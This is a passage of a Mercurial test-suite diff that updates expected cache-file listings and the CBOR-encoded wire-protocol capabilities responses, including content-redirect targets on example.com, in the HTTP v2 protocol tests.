/remote-with-names/.hg/bookmarks.current /remote-with-names/.hg/cache/branch2-served /remote-with-names/.hg/cache/hgtagsfnodes1 - /remote-with-names/.hg/cache/rbc-names-v1 - /remote-with-names/.hg/cache/rbc-revs-v1 /remote-with-names/.hg/cache/tags2-served /remote-with-names/.hg/dirstate /remote-with-names/.hg/localtags @@ -266,7 +262,6 @@ /remote/.hg/cache/branch2-served /remote/.hg/cache/hgtagsfnodes1 /remote/.hg/cache/rbc-names-v1 - /remote/.hg/cache/rbc-revs-v1 /remote/.hg/cache/tags2-served /remote/.hg/dirstate /remote/.hg/localtags @@ -288,8 +283,6 @@ /sub/.hg/bookmarks /sub/.hg/bookmarks.current /sub/.hg/cache/hgtagsfnodes1 - /sub/.hg/cache/rbc-names-v1 - /sub/.hg/cache/rbc-revs-v1 
/sub/.hg/dirstate /sub/.hg/requires /sub/.hg/store/00changelog.i diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -150,7 +150,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -190,7 +190,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -223,7 +223,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequi
red\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -484,7 +484,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions
\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending capabilities command s> setsockopt(6, 1, 1) -> None (?) s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -66,9 +66,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2308\r\n + s> Content-Length: 2289\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissio
ns\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (tls1.2 !) (remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !) sending capabilities command @@ -396,9 +396,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2335\r\n + s> Content-Length: 2316\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4Dty
peDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
